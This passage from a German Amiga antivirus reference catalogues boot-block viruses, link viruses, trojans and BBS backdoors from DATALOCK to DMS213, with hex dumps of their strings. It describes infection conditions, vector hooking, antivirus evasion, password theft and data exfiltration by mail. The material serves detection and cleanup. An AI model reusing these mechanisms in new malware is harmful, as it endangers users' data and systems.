KEIN backup vom Rigidbereich Ihrer Festplatte haben, bekommen Sie Probleme. Vermehrung: BB Meldung: soll sich in Abhaengigkeit von einer Zaehlzelle mit Displayalert melden. Version 1.1 : - in Abhaengigkeit von Zaehlzelle: - schreibt BB 2 Bloecke lang kein Problem - schreibt Speicher ab $7FAAD nach $6E000 auf Medium. Bei einer DD-Disk ist das der Rootblock (880). Ich mache Ihnen wenig Hoffnung. Probieren Sie Disksalv2. - schreibt Speicher ab $7FAAD nach $6F400 auf Medium. Bei einer DD-Disk ist das Block 890. Es werden $1000 Bytes = 8 Bloecke !!! geschrieben. Also ist in 890 "DATALOCK" zu lesen und die folgenden Bloecke sind AUCH unbrauchbar, weil sie Speichermuell enthalten. Auszug mit VT-drucke: 0000: 0a444154 414c4f43 4b20312e 31202863 .DATALOCK 1.1 (c 0010: 29206039 34210000 414c4c20 283f2920 ) `94!..ALL (?) 0020: 434f4445 20425920 44454154 48434f52 CODE BY DEATHCOR 0030: 452e0007 fae60000 00004afc 0007fae6 E.........J..... usw. Version 1.2 : - in Abhaengigkeit von Zaehlzelle: - schreibt BB ABER immer $800 also 4 Bloecke. Falls also ein File auf dieser Disk Block 2 u. 3 von Zylinder 0 belegt hat, so wird es immer unbrauchbar. Test mit VT BlockKette ergibt bad Data !!! - schreibt Speicher ab $7FAAD nach $6E000 auf Medium. Bei einer DD-Disk ist das der Rootblock (880). Ich mache Ihnen wenig Hoffnung. Probieren Sie Disksalv2. - berechnet ueber $DFF006 einen Block und schreibt Speicher ab $7FAAD in diesen Block. Da $800 = 4 Bloecke geschrieben wer- den, enthalten die folgenden Bloecke Speichermuell und sind AUCH unbrauchbar. Auszug mit VT-drucke: 0000: 0f3e3e3e 20444154 414c4f43 4b20312e .>>> DATALOCK 1. 0010: 32203c3c 3c206039 34210001 00be1b28 2 <<< `94!.....( 0020: 63292062 79204445 41544843 4f52452e c) by DEATHCORE. 0030: 00000007 fae60000 00004afc 0007fae6 ..........J..... - DATALOCK Installer File Laenge gepackt: 1996 Bytes Laenge entpackt: 2992 Bytes Soll DATALOCK-BB (siehe oben) auf BB schreiben. Selbst keine verbogenen Vektoren. Keine Vermehrung KS1.3: ja KS2.04: bei mir nur wirre Zeichen auf dem Bildschirm. Dringende Empfehlung: loeschen Hinweis 15.02.95: Es wurde der Installer noch einmal gefunden. Nur enthaelt er jetzt den ASS-Anti-BB. Im File ist zu lesen: 2e200001 00552e2a 2a2a2054 68616e6b . ...U.*** Thank 7320746f 20746865 20415353 20564952 s to the ASS VIR 55532050 524f5445 43544f52 2056312e US PROTECTOR V1. Sie machen also NICHTS falsch, wenn Sie dieses Teil AUCH loeschen. Es scheint hier jemand einmal eine allgemeine BB-Install-Routine geschrieben zu haben. - datat.lib.45.5-Troj Filelaenge: 32832 Bytes 32748 Bytes Im File ist zu lesen: 64617461 74797065 732e6c69 62726172 datatypes.librar 79002456 45523a20 64617461 74797065 y.$VER: datatype 732e6c69 62726172 79203435 2e352028 s.library 45.5 ( 31372e32 2e393829 0d0a0000 000002bc 17.2.98)........ Aussagen im Netz Mai 98: - sucht nach bsdsocket.lib (wird in dem File mit einem Monitor nicht gefunden (vielleicht codiert)). siehe unten - setzt verschiedene Gurus - ist NICHT vom echten Programmierer - war nur kurz im Aminet - im Aminet wieder ersetzt durch V 45.4 (27780 Bytes) Loeschen Sie also bitte zu ihrer eigenen Sicherheit die Version 45.5 und schreiben Sie wieder V45.4 zurueck. Ende Mai 98 war weder eine "echte" V45.5 noch eine neue V 45.6 erschienen. Nachtrag Dez 98: Eine Lib mit der Laenge 32748 Bytes wurde mir zugeschickt. Im Text (s.o.) ist die Versions-Nr geaendert, NICHT aber im Lib-Header. Das Teil wird mit 45.4 eingetragen (vgl. Versions- Befehl). Im File ist decodiert zu lesen: 4d69 616d6900 4d69616d Miami.Miam 693a6d69 616d692e 64656661 756c7400 i:miami.default. 686f7374 00006d61 696c2e68 6f746d61 host..mail.hotma 696c2e63 6f6d0000 62736473 6f636b65 il.com..bsdsocke 742e6c69 62726172 79004845 4c4f0d0a t.library.HELO.. 4d41494c 2046524f 4d3a3c62 61616c3e MAIL FROM:<baal> 0d0a5243 50542054 4f3a7978 67687173 ..RCPT TO:yxghqs 0d0a4441 54410d0a 5375626a 6563743a ..DATA..Subject: 20000d0a 2e0d0a51 5549540d 0a00536e ......QUIT...Sn 6f6f7044 6f732053 7570706f 72742050 oopDos Support P 726f6365 73730000 454e5641 52433a6d rocess..ENVARC:m 63632e70 72656673 0000 cc.prefs.. SnoopDos wird im Speicher gesucht. Falls da Ende bsdsocket.lib wird geoeffnet. Falls nein Ende Miami wird gesucht. Falls nein Ende Fremdaussage (Danke): Das Teil verschickt in der Tat einen Teil der Miami.defaults an eine hotmail-adresse. Stand Dez 98: Schreiben Sie bitte UNBEDINGT die Version 45.4 zurueck. Es gibt immer noch keine "echte" Version 45.5 oder 45.6 Stand 31. Dez 98: Ich habe noch eine 45.5-lib erhalten. Laenge: 30844 Bytes. Es handelt sich um die Fake-Version (s.o.) OHNE (!!!) den Miami-Teil. Sonst sind die beiden Teile bis auf einen Sprungbefehl (in den Miami-Teil) GENAU gleich. VT sollte bei dieser Filelaenge einen Requester mit Fragezeichen ausgeben. Entscheiden Sie bitte dann selbst. - DEBUGGER-Virus Link Verlaengert ein File um 1088 Bytes KS 1.3 : GURU (wg. z.B. CacheClearU) KS 2.0 : ja Verbogene Vektoren: DosWrite, LoadSeg Nicht resetfest Aktivierung im Speicher: Nur wenn in Dos.lib $4EF9 verwendet wird. Vermehrung: Ein Orig-Teil im 1.Hunk wird ans Fileende gerettet und durch ein Virusteil ersetzt. Das 2.Virusteil haengt auch am File- ende in einem 3F1-Hunk . Bedingungen: File ausfuehrbar 3F3 die ersten 4 Bytes des 1. Hunks enthalten weder $4e75 noch $4afc (wg. Lib) Medium validated #82 #8192 Bloecke frei also keine Disk der 1.Hunk mindestens eine bestimmte Laenge hat VT versucht den Ausbau. Am Ende eines verseuchten Files ist zu lesen: 23c00000 20444542 55474745 52283034 #... DEBUGGER(04 31393934 292043fa 1994) C.. - Decompiler-Trojan Laenge: 53992 Bytes Name: so heisst das File Verbogene Vektoren: Keine Nicht Resetfest Keine Vermehrung Schaeden: Verlaengert libs, l, devs und fonts um ein Leer- zeichen. Sie bekommen also Probleme beim naechsten Bootvor- gang, da die Dir-Namen nicht mehr stimmen. Abhilfe: Laden Sie ein Dir-Util-Prg. und entfernen Sie jeweils das Leerzeichen. VT bietet Loeschen an. Im File ist zu lesen: 7379733a 6c696273 00097379 733a6c69 sys:libs..sys:li 62732000 00057379 733a6c00 00067379 bs ...sys:l...sy 733a6c20 00087379 733a6465 76730009 s:l ..sys:devs.. 7379733a 44657673 20000009 7379733a sys:Devs ...sys: 666f6e74 7300000a 7379733a 666f6e74 fonts...sys:font 73200000 00000000 000003f2 000003e9 s .............. Das File meldet sich auf dem Bildschirm mit: Autoboot disk creator Angeblich soll ein ausgewaehltes compiliertes Programm in die startup-seq. uebernommen werden. Dieses Trojanteil koennte auch als AMOS-Utility weitergegeben werden. Hinweis Okt.94: Im Moment kommt es bei einigen Antivirusprogrammen bei jedem 3. oder 4. Amosfile zu einer Decompiler-Fehlerkennung. Beispiel: Bavarian 333 AMastermind Das File enthaelt den Decompiler aber NICHT !!!!! Ich nehme an, dass diese Fehlerkennungen bei den naechsten Updates behoben sein werden. - Degrad-Trojan reines Zerstoerungsfile Laenge ungepackt: 5612 Bytes Keine verbogenen Vektoren Nicht resetfest Name nicht nachvollziehbar, sondern uebernommen. Im File ist uncodiert zu lesen (danach sehr viele 0) : fe3e4e75 73637369 2e646576 69636500 .>Nuscsi.device. 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ ;...usw Zerstoerung: Nach Aufruf (Cli) wird versucht Unit 0 mit scsi.device zu oeffnen. Falls gefunden, werden #5120 Bytes mit Nullen ab Sektor Null geschrieben. Dies duerfte den Rigid-Bereich der Festplatte unbrauchbar machen. Aber Sie haben natuerlich laengst ein Backup des Rigid-Bereichs ihrer Festplatte, oder etwa doch nicht ? (zeige Zyl/Backup) VT bietet loeschen an - Deniz Cool SCA-Clone nur Text geaendert - DERK1 u. 2 BB richtiger Name: MALLANDER VIRUS V1.0 Hinweis: Derk1=Derk2 Beweis fuer Nichtassemblerfreaks: nutzen Sie die Funktion vgl. in VT . Die 1 und 2 in der BB-Checksum ergeben sich aus den abgespeicherten unterschiedlichen DoIo's. Sonst KEINE Unterschiede . - Descriptor-Virus ein Zerstoerungsfile Laenge: 7016 Bytes Namensbegruendung: s.u. Keine verbogenen Vektoren Testet auf mindestens KS2.04 s.u. Sucht nach S:Descriptions.TXT Behauptet Snap zu suchen, holt aber in Wirklichkeit aus c den delete-Befehl und loescht alle Files. Durch die verbrauchte Zeit sollte Ihnen das schon auffallen. Wenn Sie danach das About-Gadget anklicken, erhalten Sie die Ausgabe: Your HD is ... s.u. Das Programm loescht aber GENAUSO ihre Disk . VT bietet nur loeschen an, da die Zerstoerungs-Routine EINGEARBEITET und nicht angelinkt ist. Es soll aber auch ein SAUBERES Descriptor-Programm geben (hab ich nicht). Das echte Programm soll Logos an Files an- haengen. Also wird die Hauptgefahr "nur" die Sysops treffen. Fileauszuege: 6F757263 65006465 6C657465 203A233F ource.delete :#? 20616C6C 20200000 80000064 00000000 all .....d.... ;.... 2F313032 2F446573 63726970 746F7220 /102/Descriptor 56332E30 20627920 436F6C6F 72626F79 V3.0 by Colorboy 206F6620 5375626D 69737369 6F6E206F of Submission o 6E203239 2D4A554E 2D313939 332F6E6F n 29-JUN-1993/no ;.... 6E6F7369 7A650000 533A4465 73637269 nosize..S:Descri 7074696F 6E732E54 58540000 0C0A9B33 ptions.TXT.....3 ;.... 64212057 68617420 61626F75 74206B69 d! What about ki 636B2032 2E303F0A 45697468 65722049 ck 2.0?.Either I ;.... 9B31303B 31304853 6E617020 6973206E .10;10HSnap is n 6F742069 6E206D65 6D6F7279 2E204920 ot in memory. I 74727920 746F206C 6F616420 69742066 try to load it f 726F6D20 432D4469 722E2020 20202020 rom C-Dir. ;.... 5B33316D 0A0A2020 2DF721F7 2D202059 [31m.. -:-!: Y 6F757220 48442069 73206465 6C657465 our HD is delete 64202E2E 2E204861 70707920 42697274 d ... Happy Birt 68646179 202D4D43 492D2F44 43532041 hday -MCI-/DCS A 48484148 41484148 41484148 4120202D HHAHAHAHAHAHA - Hinweis 01.08.93: Das Zerstoerungsteil wird auch als zsped.lha weiter- gegeben. Laenge: 20817 Bytes (allerdings mit mehreren Boxenhinweisen). Das Virusteil nennt sich dort SPEEDER.EXE (Laenge: 7016). Also nur ein anderer Name. Die Doc ver- sucht zu verwirren, indem sie die Funktion des Programms falsch beschreibt. SPEEDER.DOC: Just RUn Speeder.exe From Ram And Watch YER CPS CLIMB On You Next Transfer Mine Increased from 1600 to 1800 On normal 14.4 HST SAMIR ZENITH LEADER Watch For Our releases!!!!! - Destructor Cold im BB sichtbar: Destructor_Virus v1.2 Written by Aldo Reset. (c) M.C.T. Ltd 1990- Everything is under control ! (eh!eh!) keine Vermehrungsroutine gefunden zerstoert beim naechsten Reset ueber Cold eine nicht schreibgeschuetzte Disk indem jeder 4. Track ueberschrieben wird. - DETLEF-Virus BB KickTag, KickCheckSum, DoIo Namensbegruendung: siehe unten Fordert trackdisk.device NICHT BB wird in den Speicher decodiert mit: add.b d1,(a0)+ Jeder neu geschriebene Virus-BB wird neu codiert in Abhaengig- keit von $DFF00A . In Abhaengigkeit von $DFF006 wird mit DisplayAlert ein Text ausgegeben. Dazu wird ein Virusteil nach $73000 kopiert und mit add.b #$ad,(a0)+ decodiert. AlertText: Guten Tag. » Ich heiße DETLEF « Ich werde Sie in der nächsten Zeit etwas nerven. Gemacht wurde ich von · M A X . Vermehrung und Schaden: BB - Devil_V8_B.Door anderer Name:SwiftWare Laenge ungepackt: 44224 Ein Hunk wurde vor das Originalfile gehaengt, um das Sysop-Pass- word auslesen zu koennen und in einem neuen File abzulegen. Ein Teil des 1.Hunks decodiert mit neg.b (a0)+ ergibt: 6262 bb 733A6E6F 6465302F 6E6F6361 6C6C6572 s:node0/nocaller 73617433 30300062 62733A75 7365722E sat300.bbs:user. 64617461 00 data. Da das Teil sich nicht vermehrt, handelt es sich nach der Definition nicht um einen Virus. Namensbegruendung: Eine Gruppe (oder Einzelperson) soll fuer diese BBS-Einbrueche verantwortlich sein. Kann ich nicht nach- pruefen. VT bietet den Ausbau an. - Devil_11_B.Door Drei Files sind mir bekannt, vor die das Teil gehaengt wurde: - DLog V1.8 Laenge verseucht: 23452 - ULog V1.8 Laenge verseucht: 23452 - MsgTop V1.0 Laenge verseucht,aber einmal entpackt: 17884 2x gepackt: 13548 Alle drei Prg.e verseucht auf A4000 = GURU 4 BackDoor-Teil ausgebaut, aber ohne BBS: = Fehler -1 Wenn Sie das BackDoorTeil entpacken, finden Sie gleich am An- fang: 000003e9 0000093d 4efa09ac 42425300 .......=N...BBS. 44483000 44483100 4844303a 00484431 DH0.DH1.HD0:.HD1 3a004448 30004448 31004844 303a0048 :.DH0.DH1.HD0:.H 44313a00 4242533a 00444830 3a424253 D1:.BBS:.DH0:BBS 2f004448 313a4242 532f0048 44303a42 /.DH1:BBS/.HD0:B 42532f00 4844313a 4242532f 00444830 BS/.HD1:BBS/.DH0 3a004448 313a0048 44303a00 4844313a :.DH1:.HD0:.HD1: Mit SnoopDos koennen Sie das nachvollziehen. Schaden: (Die folgende Aussage wurde uebernommen) Sucht nach Files mit Laenge 1972 Bytes und aendert sie so ab, dass ab Level 10 Account edit und Sysop download moeglich wird. Da das Teil sich nicht vermehrt, handelt es sich nach der Definition nicht um einen Virus. Namensbegruendung: Eine Gruppe (oder Einzelperson) soll fuer diese BBS-Einbrueche verantwortlich sein. Kann ich nicht nach- pruefen. VT bietet den Ausbau an. Nachtrag 25.03.95: vgl. auch ZINE-Disk-Validator Nachtrag 15.04.95: vgl. auch VScan-BBS-Trojan - DEVIL-ZINE siehe bei ZINE-Disk-Validator - DiavoloR-zerst. ? KEIN Virus Fremdaussage: Die Files wurden von einer Diavolo-Raubkopie un- brauchbar gemacht. Da nur auf zwei Langworte getestet werden kann, ist die Ausgabe moeglicherweise nicht immer richtig. In so einem File ist zu lesen: DmsToy 0000: 43726163 6b656421 00000004 00000000 Cracked!........ 0010: 00000003 00000012 40001272 40001a2f ........@..r@../ - Died siehe bei PP-Bomb - DIGITAL AGE = Rude Xerox = Forpib-Clone nur Text geaendert - DIGITAL-DREAM-Inst. File anderer Name: Jeffkiller V2.67 Laenge gepackt : 6496 Bytes Laenge entpackt: 9960 Bytes Man erkennt, dass es sich um ein Hunklab-File handelt. - Ein Virusinstall-Teil fuer den Speicher. - Ein Bildanzeigeteil mit Bilddaten - Ein Code um Jeffkiller.info auf die Disk zu schreiben. Jeffkiller.info Laenge: 54 Bytes 4a656666 76697275 73206f6e 20446973 Jeffvirus on Dis 6b207761 73206b69 6c6c6564 2e2e2e0a k was killed.... 6279204a 6566666b 696c6c65 72205632 by Jeffkiller V2 2e363720 0a000000 00000000 00000000 .67 ............ Das Teil behauptet im Bild ein Jeff-Killer zu sein. In Wirk- lichkeit wird im Speicher das BB-Virusteil installiert. Wenn Sie mit der Maustaste einen Suchvorgang ausloesen, wird auf die Disk auch ein Textfile s.o. geschrieben. VT bietet loeschen an. - DIGITAL-DREAM-Virus BB (0-3) Im Speicher immer ab $7f400 Verbogene Vektoren: Supervisor, DoIo, KickTag, KickChecksum KS1.3 : ja KS2.04: ja 68030: nein Fordert trackdisk.device NICHT Namensbegruendung: im decodierten BB ist zu lesen 203e3e44 49474954 414c2044 5245414d >>DIGITAL DREAM 3c3c2000 6279204d 6178206f 66205374 << .by Max of St 61724c69 67687400 48e7fffe 2c790000 arLight.H...,y.. Ablauf: - rettet Orig.BB - Haengt eigenes Virusteil davor. - Codiert BB-Virus mit eor.b x,(a0)+ neu. (x abhaengig von $DFF006) - Schreibt 4 Bloecke zurueck. D.h. ein File das an Block 2 beginnt, wird zerstoert. Sie koennen die Reste des Files nur noch loeschen. VT bietet an, den Orig.BB zu suchen (O-BB) und kann ihn wieder installieren. - DIGITAL EMOTIONS Cool, im Prg. DoIo und zurueck, immer $7ec00 im BB immer sichtbar: *** DIGITAL EMOTIONS *** je nach Zaehlerstand - wird eigener BB geschrieben oder - Track 0 mit 'VIRUS ' beschrieben. Folge: keine Dos-Disk Textausgabe (decodiert mit -1) ueber DisplayAlert: KickStart ROM Corrupted at $c00276 - DirtyTricks richtiger Name Incognito (das VirusPrg speichert am Ende des BB`s Tabellen mit ab, die sich nach Speicherlage und Konfiguration des Amiga aendern. Beim Booten des Viruses werden die Tabellen neu angelegt !!!) - DISASTER MASTER V2 ( cls * ) 1740 Bytes eigenstaendiges Prg. fuer startup-sequence KickTag, KickCheck im Prg. DoIo und wieder zurueck Cool und Cold werden geloescht Entfernung: 1.Zeile in startup. loeschen cls in DfX:c loeschen Erstellungsprogramm: Intro-Maker von T.C.R. Laenge: 10624 Bytes (war vor der Entdeckung z.B. auf Franz 47) - DISGUST BB Cool $7EDDE, DoIo $7ECA4 im Speicher immer $7EC00 KS2.04: GURU nach RESET Fordert trackdisk.device NICHT Schaden und Vermehrung: ueber BB Versucht durch im BB lesbaren Text zu taeuschen: 003e2041 6d696761 .> Amiga 20353030 20557469 6c697479 2020426f 500 Utility Bo 6f74426c 6f636b20 56310030 20546869 otBlock V1.0 Thi 73206973 204e4f20 56697275 73203c00 s is NO Virus <. Namensbegruendung: Decodiert mit : not.b (a1) eori.b #$28,(a1)+ steht im Speicher: 20546869 Thi 73206973 20746865 20444953 47555354 s is the DISGUST 202d2056 69727573 20627920 4d617820 - Virus by Max - DiskSalv 3.01 Loader siehe bei MODEMCHECK-Virus - DiskSpeeder-Trojan andere moegliche Namen: GVP-HardDiskSpeeder Karacic-Trojan siehe dort - Disk Speed Check V1.01ß Virus anderer Name: DSC101 s.u. - Disk-Doktors (KickV1.2 da absolute ROM-Einspruenge) Cold, Cool, DoIo Fordert trackdisk.device NICHT Die angeblichen Mutanten unterscheiden sich in $4 (Pruefsumme) und von $390-$3A8 (Variablenablage = bei jedem Reset anders) Im BB ist uncodiert zu lesen 0000a3e0 000000f0 20284329 7261636b ........ (C)rack 72696768 74206279 20446973 6b2d446f right by Disk-Do 6b746f72 73202020 20200000 00000000 ktors ...... - DiskDoktors-Lader KEIN Virus !!!!!! Über einen DD-BB-Virus wurde ein BB-Lader gespielt. Dieser soll Diskinhalte aus einem hohen Sektorbereich auf Disk nachladen und dann in den Ladebereich springen. Da der BB-Lader nicht den ganzen BB belegt, ist am Ende des BBs (C)rackright usw. stehengeblieben. Dieser Bereich wird vom BB-Lader NIE (!!!!) erreicht. Wenn also einige Antivirus- programme bei diesem BB einen BB-Virus erkennen, so handelt es sich um eine FEHLERKENNUNG !!!!! - Disk-Herpes Cool, im Prg. DoIo, im Speicher immer ab $7ec00 wird haeufig mit Phantasmumble verwechselt, Fastmem ja Vermehrung: ueber BB Schaden: schreibt auf Track 80 (Root) Speicherinhalt ab $60000. Folge: Disk BAD Graphikroutine: Deutschlandfahne + Text (auch im BB sichtbar) --- Hello Computerfreak --- You've got now your first VIRUS ** D i s k - H e r p e s ** Many Disks are infected !! Written by >tshteopghraanptha< c 27.07.1987 in Berlin - Disk.info Laenge: 370 Bytes KEINE Vermehrung Ein OriginalWB1.3-Icon wurde in der Struktur geaendert. (Text eingebaut z.B. This is a little present for all Lamers abroad ). Sobald Sie diese Disk einlegen und es muesste das Disk-Icon auf der WB angezeigt werden, stuerzt der Rechner ab. Haben Sie die Startup-Sequence im Cli abgebrochen, so muss kein Icon dargestellt werden und deshalb koennen Sie mit dieser Disk ohne Probleme arbeiten. AbHilfe: Ersetzen Sie Disk.info . Herkunft: unbekannt (Disk-Packer ???) - DISK-KILLER V1.0 File Laenge ungepackt: 1368 Bytes Unter welchem Filenamen das Programm weitergegeben wird, ist mir unbekannt. (wahrscheinlich disktest) Namensbegruendung: im File steht uncodiert: 20204449 534b2d4b 494c4c45 52205631 DISK-KILLER V1 2e302020 200a .0 . Nach dem Fileaufruf wird folgender Text ausgegeben: " DISK-KILLER V1.0 ",10 "HEY YOU IN FRONT OF THE SCREEN !",10 "YOU ARE A LAMER !!!! HE HE HE ",10 "WHY ????",10 "- BECAUSE YOU HAVE A VIRUS !!",10 "HE HE HE ",10 "THIS WAS DONE IN TEN MINUTES",10 "BY THE MEGA-MIGHTY MAX ",10 "BYE BYE DISK !!",10 "GREETS ARE GOING TO:",10 "> LAMER EXTERMINATOR <",10 "SUFFER...",10 Danach beginnt SOFORT die Zerstoerungsarbeit in ALLEN Disk- Laufwerken. Die Disketten sind danach WERTLOS. Sie muessen sie neu formatieren. Das Virusteil ist also NICHT im Speicher zu finden, sondern nur beim Filetest. Von der Definition her handelt es sich nicht um ein Virus-Programm, da keine Ver- mehrung angestrebt wird. VT getestet: 21.11.92 Bitte ueber- pruefen Sie nach dem Loeschen des Files auch die startup- sequence ihrer Disk. siehe auch: XaCa-D.Killer = Clone - Disk-Terminator Virus BB SCA-Clone siehe unten Namensbegruendung: im BB ist zu lesen 20202044 69736b2d 5465726d 696e6174 Disk-Terminat 6f722056 69727573 20202020 2020d2aa or Virus .. Anfaengerprogrammierung: graphics.library liegt an ungerader Adresse. GURU ist sicher fe018000 00ffffff fe0428ff fafbd367 ..........(....g 72617068 6963732e 6c696272 61727900 raphics.library. ^ Weiterer Auszug: 43fa lea 743(PC)(=$a030f),A1 2c79 move.l $000004,A6 4eae jsr -96(A6) 2040 move.l D0,A0 2068 move.l 22(A0),A0 7000 moveq #$00,D0 4e75 rts doslibname wird an ungerader Adresse gesucht, ist aber an ge- rader Adresse. Also wird nach Name gesucht, der mit 0 beginnt. (siehe ^ ) GURU ist sicher. Verantwortlich zeichnet SLASH - Disnomia-Inst. Installer Filelaenge: 1108 Bytes verbogene Vektoren: LoadSeg, Newloadseg Vor das UNCODIERTE Linkteil wurden einige Bytes fuer den Start gestellt. - Disnomia-LVirus Linkvirus vgl. auch Elbereth3 Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 00bfd100 60ce3d3d 3d202121 21204469 ....`.=== !!! Di 736e6f6d 69412021 2121203d 3d3d20a9 snomiA !!! === . 202a204d 61442072 6f474572 20313939 * MaD roGEr 199 37202a20 506f6c61 6e640054 68697320 7 * Poland.This Fileverlaengerung: #1060 Bytes Nicht Resetfest Verbogene Vektoren: LoadSeg NewLoadSeg Speicherverankerung: - Test ob schon im Speicher ($2F01) - Loadseg und NewloadSeg wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Es ist deshalb sinnvoll ihr Antivirusprogramm fuer den privaten !!!! Gebrauch umzubenennen, sonst koennten Sie meinen Ihr System sei sauber, da sich das Teil bei "v" oder "V" aus dem Speicher entfernt. Linkvorgang: - mit LoadSeg und NewLoadSeg - File noch nicht verseucht (Datum) Wenn Sie also ein verseuchtes File kopieren und das File- Datum nicht mitnehmen, kann es zu einer Mehrfachverseuchung kommen. - Medium validated - 4 Block frei - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - File groesser #2120 Bytes - File kleiner #282286 Bytes - 1. Hunk kleiner $1fff x 4 = #32764 Bytes - Gesucht wird im 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAE wxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt. - das Teil codiert sich immer neu mit $DFF007 Zerstoerung: Falls der Wert $AA in D7 erreicht wird, soll eine "Floppy-Musik" ausgeloest werden. Ihr Disklaufwerk wird also durch Endanschlaege Schaden nehmen, wenn Sie nicht schnell reagieren. - Disktroyer V1.0 File Laenge ungepackt: 804 Bytes AllocMem auch mit KS2.04 Versucht durch Loeschen des Cli-Fensters zu taeuschen. Ich vermute deshalb, dass das File als Cls-Befehl getarnt wird. Im File zu lesen: Disktroyer V1.0 usw. Keine Vermehrungsroutine Schaeden, wenn: - allocmem angesprungen wird und - in der Zaehlzelle der Wert $96 steht - Disk im Laufwerk liegt - Disk nicht schreibgeschuetzt ist dann: - Kopfstep (Zerstoerung der Disk(s)) alle Laufwerke (Routinen stehen nach meiner Meinung genau so in einem bekannten Buch !!!!!) - DisplayAlert: Disktroyer V1.0 usw. Empfehlung: File loeschen (VT) und startup-sequence ueber- pruefen . - Disktroyer V2.0 File Laenge ungepackt: 812 Bytes GetMsg auch mit KS2.04 Versucht durch Loeschen des Cli-Fensters zu taeuschen. Ich vermute deshalb, dass das File als Cls-Befehl getarnt wird. Im File zu lesen: 01041444 69736b74 726f7965 72205632 ...Disktroyer V2 2e300001 00c82828 77292061 6e6420a9 .0....((w) and . 20313939 31206279 20746865 20706f77 1991 by the pow 65726675 6c200001 01003c54 68652046 erful ....<The F 616e6174 69632043 72657720 00010098 anatic Crew .... usw. ..... Keine Vermehrungsroutine Schaeden, wenn: - GetMsg angesprungen wird und - in der Zaehlzelle der Wert $222222 steht (Wert wird zuegig erreicht) - Disk im Laufwerk liegt - Disk nicht schreibgeschuetzt ist dann: - Kopfstep (Zerstoerung der Disk(s)) alle Laufwerke (Routinen stehen nach meiner Meinung genau so in einem bekannten Buch !!!!!) - DisplayAlert: Disktroyer V2.0 usw. Empfehlung: File loeschen (VT) und startup-sequence ueber- pruefen . - Disk-Val. RTS (L) File Loeschen Laenge 1848 Bytes KEIN Virus Das Original wurde durch ein File ersetzt, das nur RTS enthaelt, also die Disk-Validator-Funktion NICHT erfuellen kann. Empfehlung: Durch Original ersetzen. Im File ist zu lesen: 000001c5 60040000 005c70ff 4e750000 ....`....\p.Nu.. ;Rest nur Null - Disk-Val.Tr.moDOS File NICHT loeschen Laenge 1848 Bytes KEIN Virus Gefunden wurde das Teil auf Disks mit BB-Loadern und NICHT-DOS- Disk-Format. Das Teil darf NICHT geloescht werden, da anscheinend der Disk-Validator fuer die andere Disk-Struktur umgeschrieben wurde. Im File ist zu lesen: 20547261 636b6d6f 444f5320 312e3020 TrackmoDOS 1.0 - DiskVal1234 Disk-Validator Laenge:1848 Bytes Grundgeruest ist der SADDAM-Disk-Validator (siehe unten) Aenderungen: nicht mehr codiert als Disk-Validator (lesbar am Fileende z.B. strap, mycon.write usw ) Veraendert Bloecke die mit 8 beginnen: Schreibt in diese Bloecke nach $5a 1234 und ab $64 dann 66x 4e71 (NOP). (Also nicht mehr Austausch von 8 mit IRAK) Rufen Sie dann ein solches File auf, so stuerzt der Rechner ab, da ja wichtiger PrgCode mit NOPs ueberschrieben wurde (bei mir wird der Bildschirm gelbbraun). So leid es mir tut, diese Files koennen NICHT gerettet wer- den. VT bietet loeschen an. Es kann also sein, dass ihre ganze Disk unbrauchbar wird. - DiVa-SADDAM-Inst. File Anderer Name: LamerKiller Laenge gepackt: 11512 Bytes KS1.3 Ja KS2.04 GURU3 Verbogene Vektoren: Cold, BeginIo usw. Installiert SADDAM-Disk-Validator (codiert IRAK) Keine Meldung im Cli - DIVINA EXTERMINATOR I Cool, DoIo, Inter.5 und $64. Im Prg dann noch $68 und $6c. Ueberschreibt SetPatchListe ab $C0. Codiert BB neu mit Wert aus $DFF006 (steht dann im BB $3F6) nach eor.w d0,d1 ist im Speicher zu lesen: VIRGO PRESENTS DIVINA EXTERMINATOR I Versucht einen sauberen OrigBB vorzutaeuschen. Schaeden und Vermehrung: BB nach 3 Vermehrungen: beginnt die K-Taste abzufragen und bis 10 in einer Zaehlzelle abzulegen. Dann wird nach $4 (ExecBase- Zeiger) der Wert 0 geschrieben = Absturz Ursprung: -p-turbo.dms - DIVINA II s.o. DIVINA EXTERMINATOR I Das Decodierwort in $3F6 ist anders. Grund s.o. (schafft endlich die Brainfiles ab !!! und disassembliert den VirenCode sauber und vollstaendig) - DLog V1.8 siehe oben Devil_11_B.Door - DM-Trash File siehe bei ZAPA-B.Door - DMS206-Trojan anderer Name Fastcall-Trojan Filename:dms206.exe Laenge:45732 Bytes Das Programm meldet sich auch so. Aber mir ist keine DMS-Version 2.06 bekannt (Stand:05.01.95). Also bitte Vorsicht. Keine verbogenen Vektoren. Keine Vermehrung . In Wirklichkeit wurde mit der $4EB9-Methode (s.o.) ein Einbruchs- werkzeug gegen Fastcall (nehme ich an) angehaengt. Vgl. auch Viewtek22-Installer und LHAV3-BBS-Trojan. Es ist ein SEHR aehnliches Muster, nur der Username wechselt. Decodiert mit eori.b #$EE,(a0)+ ist in dem Trojanteil zu lesen: "S:HauptPfad",0 "User/SYSOP/Userdaten",0 ;....... "SnoopDos",0 Zuerst wird nach aktivem SnoopDos gesucht. Falls gefunden: Abbruch mit Selbstloeschung im Speicher. VT bietet Ausbau an. Aber Vorsicht bitte wg. der DMS-Vers.Nr. DMS-File Laenge ohne Trojan: 43952 Bytes - DMS213-Trojan Zerstoerungsfile Laenge ungepackt: 92440 Bytes Keine verbogenen Vektoren Die DMS-Version 2.13 gibt es noch nicht (Stand: 15.06.94) Zerstoerung: Vom Filebeginn wird mit JMP in eine Execute-Routine am File- ende gesprungen, die eine Formatierung von dh0: ausfuehren soll. VT bietet Ausbau an (Laenge dann: 92208 Bytes). Es duerfte sich hierbei um DMS2.01 handeln. Im entstehenden File bleiben noch einige falsche Textstellen zurueck. Da es inzwischen (Stand: 15.06.94) neuere DMS-Versionen geben soll, waere es mir lieber, Sie loeschen das File ganz und spielen eine saubere Version neu auf. Danke Im verseuchten File ist zu lesen: 646f732e 6c696272 61727900 24564552 dos.library.$VER 3a204465 76696365 2d4d6173 6865722d : Device-Masher- 53797374 656d2076 322e3133 2039342d System v2.13 94- 30362d30 31004e55 ffe448e7 37322648 